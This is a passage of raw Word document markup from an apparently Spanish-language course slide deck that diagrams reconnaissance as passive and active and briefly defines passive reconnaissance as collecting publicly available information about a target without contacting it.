                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4636135" h="1138555">
                                <a:moveTo>
                                  <a:pt x="0" y="189737"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6778" y="139303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25908" y="93979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55578" y="55578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="93980" y="25907"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139303" y="6778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189737" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4446270" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496704" y="6778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4542028" y="25908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4580429" y="55578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4610100" y="93980"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629229" y="139303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4636008" y="189737"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4636008" y="948689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629229" y="999124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4610099" y="1044448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4580429" y="1082849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4542027" y="1112520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496704" y="1131649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4446270" y="1138427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189737" y="1138427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139303" y="1131649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="93979" y="1112519"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55578" y="1082849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25907" y="1044447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6778" y="999124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="948689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="189737"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="402" name="Graphic 402"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2989580" y="1145539"/>
                            <a:ext cx="2393315" cy="1499235"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2393315" h="1499235">
                                <a:moveTo>
                                  <a:pt x="2393315" y="1423035"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2364740" y="1423035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2364740" y="759079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2364740" y="740029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195959" y="740029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195959" y="79248"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195197" y="79248"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195197" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1176147" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1176147" y="747649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28575" y="747649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28575" y="1422654"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1422654"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38100" y="1498854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69850" y="1435354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="1422654"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47625" y="1422654"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47625" y="766699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195959" y="766699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1195959" y="759079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345690" y="759079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345690" y="1423035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2317115" y="1423035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2355215" y="1499235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2386965" y="1435735"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2393315" y="1423035"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="403" name="Graphic 403"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6350" y="2642870"/>
                            <a:ext cx="8510270" cy="745490"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="8510270" h="745490">
                                <a:moveTo>
                                  <a:pt x="0" y="124205"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9763" y="75866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36385" y="36385"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75866" y="9763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124206" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3353562" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3401901" y="9763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3441382" y="36385"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3468004" y="75866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3477768" y="124205"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3477768" y="621029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3468004" y="669369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3441382" y="708850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3401901" y="735472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3353562" y="745235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124206" y="745235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75866" y="735472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36385" y="708850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9763" y="669369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="621029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="124205"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="8510270" h="745490">
                                <a:moveTo>
                                  <a:pt x="5033772" y="124205"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5043535" y="75866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5070157" y="36385"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5109638" y="9763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5157978" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8385809" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8434149" y="9763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8473630" y="36385"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8500252" y="75866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8510016" y="124205"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8510016" y="621029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8500252" y="669369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8473630" y="708850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8434149" y="735472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8385809" y="745235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5157978" y="745235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5109638" y="735472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5070157" y="708850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5043535" y="669369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5033772" y="621029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5033772" y="124205"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="C00000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="404" name="Textbox 404"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2629407" y="394588"/>
                            <a:ext cx="2630805" cy="407034"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="539AE3FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="641" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:sz w:val="64"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="64"/>
                                </w:rPr>
                                <w:t>Reconocimiento</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="405" name="Textbox 405"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="493394" y="2891408"/>
                            <a:ext cx="2515235" cy="228600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="63AB07CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="360" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-4"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>RECONOCIMIENTO PASIVO</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="406" name="Textbox 406"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5565013" y="2922523"/>
                            <a:ext cx="2437130" cy="228600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2AA895D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="360" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>RECONOCIMIENTO ACTIVO</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="67E7C4C6" id="Group 399" o:spid="_x0000_s1204" style="position:absolute;margin-left:164.4pt;margin-top:16.55pt;width:671.1pt;height:267.3pt;z-index:-15651328;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordsize="85229,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">
                <v:shape id="Graphic 400" o:spid="_x0000_s1205" style="position:absolute;left:18564;top:63;width:46362;height:11386;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4636135,11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" path="m4446270,l189737,,139303,6778,93980,25907,55578,55578,25908,93979,6778,139303,,189737,,948689r6778,50435l25907,1044447r29671,38402l93979,1112519r45324,19130l189737,1138427r4256533,l4496704,1131649r45323,-19129l4580429,1082849r29670,-38401l4629229,999124r6779,-50435l4636008,189737r-6779,-50434l4610100,93980,4580429,55578,4542028,25908,4496704,6778,4446270,xe" fillcolor="#f1f1f1" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 401" o:spid="_x0000_s1206" style="position:absolute;left:18564;top:63;width:46362;height:11386;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4636135,11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" path="m,189737l6778,139303,25908,93979,55578,55578,93980,25907,139303,6778,189737,,4446270,r50434,6778l4542028,25908r38401,29670l4610100,93980r19129,45323l4636008,189737r,758952l4629229,999124r-19130,45324l4580429,1082849r-38402,29671l4496704,1131649r-50434,6778l189737,1138427r-50434,-6778l93979,1112519,55578,1082849,25907,1044447,6778,999124,,948689,,189737xe" filled="f" strokecolor="#c00000" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 402" o:spid="_x0000_s1207" style="position:absolute;left:29895;top:11455;width:23933;height:14992;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2393315,149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" path="m2393315,1423035r-28575,l2364740,759079r,-19050l1195959,740029r,-660781l1195197,79248r,-79248l1176147,r,747649l28575,747649r,675005l,1422654r38100,76200l69850,1435354r6350,-12700l47625,1422654r,-655955l1195959,766699r,-7620l2345690,759079r,663956l2317115,1423035r38100,76200l2386965,1435735r6350,-12700xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 403" o:spid="_x0000_s1208" style="position:absolute;left:63;top:26428;width:85103;height:7455;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="851027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" path="m,124205l9763,75866,36385,36385,75866,9763,124206,,3353562,r48339,9763l3441382,36385r26622,39481l3477768,124205r,496824l3468004,669369r-26622,39481l3401901,735472r-48339,9763l124206,745235,75866,735472,36385,708850,9763,669369,,621029,,124205xem5033772,124205r9763,-48339l5070157,36385,5109638,9763,5157978,,8385809,r48340,9763l8473630,36385r26622,39481l8510016,124205r,496824l8500252,669369r-26622,39481l8434149,735472r-48340,9763l5157978,745235r-48340,-9763l5070157,708850r-26622,-39481l5033772,621029r,-496824xe" filled="f" strokecolor="#c00000" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 404" o:spid="_x0000_s1209" type="#_x0000_t202" style="position:absolute;left:26294;top:3945;width:26308;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39AE3FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="641" w:lineRule="exact"/>
                          <w:rPr>
                            <w:sz w:val="64"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="64"/>
                          </w:rPr>
                          <w:t>Reconocimiento</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 405" o:spid="_x0000_s1210" type="#_x0000_t202" style="position:absolute;left:4933;top:28914;width:251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3AB07CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="exact"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-4"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>RECONOCIMIENTO PASIVO</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 406" o:spid="_x0000_s1211" type="#_x0000_t202" style="position:absolute;left:55650;top:29225;width:243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2AA895D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="exact"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>RECONOCIMIENTO ACTIVO</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BAB1F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1180" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC0AD2A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="649" w:lineRule="exact"/>
        <w:ind w:left="1001" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reconocimiento pasivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFE320" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="307"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28790550" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="980"/>
          <w:tab w:val="left" w:pos="1106"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1630" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485392384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37C51832" wp14:editId="1F3DF69B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>8211311</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-54854</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3980688" cy="4123944"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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185" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3980688" cy="4123944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>También conocida como Recopilación Pasiva de Información, es una técnica para obtener información sobre el objetivo sin hacer una conexión real con el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD9ADD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="268"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBAF117" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="979"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="979" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Obtendremos la información que esté disponible públicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBFF345" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:left="1001"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Con esta técnica nunca podemos ser detectados por el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E477E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D8D0F3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="979"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="644" w:lineRule="exact"/>
        <w:ind w:left="979" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Pero el reconocimiento pasivo tiene su propia limitación, que es que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>obtendrá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4FA09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="980"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cantidad específica de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88D335" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="600" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
